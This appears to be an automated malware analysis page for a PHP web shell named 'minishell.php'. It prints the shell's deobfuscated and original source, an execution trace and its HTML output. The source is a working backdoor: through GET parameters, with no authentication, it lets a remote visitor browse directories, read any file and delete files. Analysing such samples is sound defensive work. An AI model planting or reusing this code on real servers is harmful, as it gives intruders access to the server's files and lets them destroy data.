PHP Malware Analysis

minishell.php

md5: 370011e58a296750ccff912d5bf4ade1

Jump to: 

Screenshot
Attributes
Input

Deobfuscated PHP code
<?php

$root = "/var/www/html";
$style1 = 'color:#000;';
$style2 = 'color:#00a;font-weight:bold;';
function updir($ADir)
{
    $ADir = substr($ADir, 0, strlen($ADir) - 1);
    $ADir = substr($ADir, 0, strrpos($ADir, '/'));
    return $ADir;
}
if (isset($_GET['file'])) {
    if (isset($_GET['del'])) {
        unlink($_GET['file']);
        die;
    }
    if (is_file($_GET['file'])) {
        header("Content-type: text/plain");
        readfile($_GET['file']);
        return;
    }
    $path = $_GET['file'] . '/';
} else {
    $path = $root . '/';
}
echo $root . '<br>';
echo $path . '<hr>';
echo '<a href="?file=' . updir($path) . '">..</a><br />';
$p = $path . '*';
foreach (glob($p) as $file) {
    echo '<span style="font-size:11px;color:#777;">' . substr(sprintf('%o', fileperms($file)), -4) . '</span> <a style="' . (is_file($file) ? $style1 : $style2) . '" href="?file=' . $file . '">' . basename($file) . '</a> - <span style="font-size:11px;color:#777;">' . filesize($file) . ' - ' . date("F d Y H:i:s", filemtime($file)) . '</span><br />';
}
echo "<hr>";
Execution traces
data/traces/370011e58a296750ccff912d5bf4ade1_trace-1676250844.5004.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 23:14:30.398269]
1	0	1	0.000153	393528
1	3	0	0.000259	406296	{main}	1		/var/www/html/uploads/minishell.php	0	0
1		A						/var/www/html/uploads/minishell.php	2	$root = '/var/www/html/uploads'
1		A						/var/www/html/uploads/minishell.php	3	$style1 = 'color:#000;'
1		A						/var/www/html/uploads/minishell.php	4	$style2 = 'color:#00a;font-weight:bold;'
1		A						/var/www/html/uploads/minishell.php	27	$path = '/var/www/html/uploads/'
2	4	0	0.000337	406344	updir	1		/var/www/html/uploads/minishell.php	31	1	'/var/www/html/uploads/'
3	5	0	0.000351	406344	substr	0		/var/www/html/uploads/minishell.php	7	3	'/var/www/html/uploads/'	0	21
3	5	1	0.000366	406488
3	5	R			'/var/www/html/uploads'
2		A						/var/www/html/uploads/minishell.php	7	$ADir = '/var/www/html/uploads'
3	6	0	0.000392	406392	strrpos	0		/var/www/html/uploads/minishell.php	8	2	'/var/www/html/uploads'	'/'
3	6	1	0.000415	406464
3	6	R			13
3	7	0	0.000429	406392	substr	0		/var/www/html/uploads/minishell.php	8	3	'/var/www/html/uploads'	0	13
3	7	1	0.000443	406528
3	7	R			'/var/www/html'
2		A						/var/www/html/uploads/minishell.php	8	$ADir = '/var/www/html'
2	4	1	0.000468	406384
2	4	R			'/var/www/html'
1		A						/var/www/html/uploads/minishell.php	32	$p = '/var/www/html/uploads/*'
2	8	0	0.000493	406392	glob	0		/var/www/html/uploads/minishell.php	33	1	'/var/www/html/uploads/*'
2	8	1	0.000530	406984
2	8	R			[0 => '/var/www/html/uploads/data', 1 => '/var/www/html/uploads/minishell.php', 2 => '/var/www/html/uploads/prepend.php']
2	9	0	0.000551	406952	fileperms	0		/var/www/html/uploads/minishell.php	34	1	'/var/www/html/uploads/data'
2	9	1	0.000567	407024
2	9	R			16895
2	10	0	0.000580	406984	sprintf	0		/var/www/html/uploads/minishell.php	34	2	'%o'	16895
2	10	1	0.000595	407368
2	10	R			'40777'
2	11	0	0.000608	407304	substr	0		/var/www/html/uploads/minishell.php	34	2	'40777'	-4
2	11	1	0.000621	407400
2	11	R			'0777'
2	12	0	0.000634	407080	is_file	0		/var/www/html/uploads/minishell.php	34	1	'/var/www/html/uploads/data'
2	12	1	0.000647	407120
2	12	R			FALSE
2	13	0	0.000661	407144	basename	0		/var/www/html/uploads/minishell.php	34	1	'/var/www/html/uploads/data'
2	13	1	0.000676	407208
2	13	R			'data'
2	14	0	0.000689	407208	filesize	0		/var/www/html/uploads/minishell.php	34	1	'/var/www/html/uploads/data'
2	14	1	0.000703	407248
2	14	R			4096
2	15	0	0.000715	407208	filemtime	0		/var/www/html/uploads/minishell.php	34	1	'/var/www/html/uploads/data'
2	15	1	0.000729	407248
2	15	R			1676250844
2	16	0	0.000742	407208	date	0		/var/www/html/uploads/minishell.php	34	2	'F d Y H:i:s'	1676250844
2	16	1	0.000798	409600
2	16	R			'February 12 2023 20:14:04'
2	17	0	0.000816	409048	fileperms	0		/var/www/html/uploads/minishell.php	34	1	'/var/www/html/uploads/minishell.php'
2	17	1	0.000832	409096
2	17	R			33204
2	18	0	0.000845	409056	sprintf	0		/var/www/html/uploads/minishell.php	34	2	'%o'	33204
2	18	1	0.000858	409440
2	18	R			'100664'
2	19	0	0.000871	409376	substr	0		/var/www/html/uploads/minishell.php	34	2	'100664'	-4
2	19	1	0.000884	409472
2	19	R			'0664'
2	20	0	0.000897	409152	is_file	0		/var/www/html/uploads/minishell.php	34	1	'/var/www/html/uploads/minishell.php'
2	20	1	0.000909	409192
2	20	R			TRUE
2	21	0	0.000922	409216	basename	0		/var/www/html/uploads/minishell.php	34	1	'/var/www/html/uploads/minishell.php'
2	21	1	0.000936	409288
2	21	R			'minishell.php'
2	22	0	0.000950	409280	filesize	0		/var/www/html/uploads/minishell.php	34	1	'/var/www/html/uploads/minishell.php'
2	22	1	0.000963	409320
2	22	R			987
2	23	0	0.000976	409280	filemtime	0		/var/www/html/uploads/minishell.php	34	1	'/var/www/html/uploads/minishell.php'
2	23	1	0.000988	409320
2	23	R			1676250844
2	24	0	0.001001	409280	date	0		/var/www/html/uploads/minishell.php	34	2	'F d Y H:i:s'	1676250844
2	24	1	0.001032	409608
2	24	R			'February 12 2023 20:14:04'
2	25	0	0.001047	409056	fileperms	0		/var/www/html/uploads/minishell.php	34	1	'/var/www/html/uploads/prepend.php'
2	25	1	0.001062	409096
2	25	R			33261
2	26	0	0.001075	409056	sprintf	0		/var/www/html/uploads/minishell.php	34	2	'%o'	33261
2	26	1	0.001088	409440
2	26	R			'100755'
2	27	0	0.001100	409376	substr	0		/var/www/html/uploads/minishell.php	34	2	'100755'	-4
2	27	1	0.001113	409472
2	27	R			'0755'
2	28	0	0.001126	409152	is_file	0		/var/www/html/uploads/minishell.php	34	1	'/var/www/html/uploads/prepend.php'
2	28	1	0.001145	409192
2	28	R			TRUE
2	29	0	0.001158	409216	basename	0		/var/www/html/uploads/minishell.php	34	1	'/var/www/html/uploads/prepend.php'
2	29	1	0.001172	409288
2	29	R			'prepend.php'
2	30	0	0.001185	409280	filesize	0		/var/www/html/uploads/minishell.php	34	1	'/var/www/html/uploads/prepend.php'
2	30	1	0.001198	409320
2	30	R			57
2	31	0	0.001211	409280	filemtime	0		/var/www/html/uploads/minishell.php	34	1	'/var/www/html/uploads/prepend.php'
2	31	1	0.001224	409320
2	31	R			1676250844
2	32	0	0.001237	409280	date	0		/var/www/html/uploads/minishell.php	34	2	'F d Y H:i:s'	1676250844
2	32	1	0.001267	409608
2	32	R			'February 12 2023 20:14:04'
1	3	1	0.001284	408560
			0.001312	316136
TRACE END   [2023-02-12 23:14:30.399459]


Generated HTML code
<html><head></head><body>/var/www/html<br>/var/www/html/<hr><a href="?file=/var/www">..</a><br><span style="font-size:11px;color:#777;">0644</span> <a style="color:#000;" href="?file=/var/www/html/beneri.se_malware_analysis">beneri.se_malware_analysis</a> - <span style="font-size:11px;color:#777;">0 - February 12 2023 20:13:57</span><br><span style="font-size:11px;color:#777;">0664</span> <a style="color:#000;" href="?file=/var/www/html/minishell.php">minishell.php</a> - <span style="font-size:11px;color:#777;">987 - February 12 2023 20:13:57</span><br><hr></body></html>
Original PHP code
<?php
$root = __DIR__;
$style1='color:#000;';
$style2='color:#00a;font-weight:bold;';

function updir($ADir){
	$ADir = substr($ADir, 0, strlen($ADir)-1);
	$ADir = substr($ADir, 0, strrpos($ADir, '/'));
	return $ADir;
}

if (isset($_GET['file'])) { 

	if (isset($_GET['del'])){
		unlink($_GET['file']);
		die;
	}

	if (is_file($_GET['file'])) {
		header("Content-type: text/plain");
		readfile($_GET['file']);
		return;
	}

	$path = $_GET['file'].'/';

} else $path = $root.'/';

echo($root.'<br>');
echo($path.'<hr>');
echo '<a href="?file='.updir($path).'">..</a><br />';
$p = $path.'*';
foreach (glob($p) as $file) {
	echo '<span style="font-size:11px;color:#777;">'.substr(sprintf('%o',fileperms($file)),-4).'</span> <a style="'.(is_file($file)?$style1:$style2).'" href="?file='.$file.'">'.basename($file).'</a> - <span style="font-size:11px;color:#777;">'.filesize($file).' - '.date("F d Y H:i:s", filemtime($file)).'</span><br />';
}
echo('<hr>');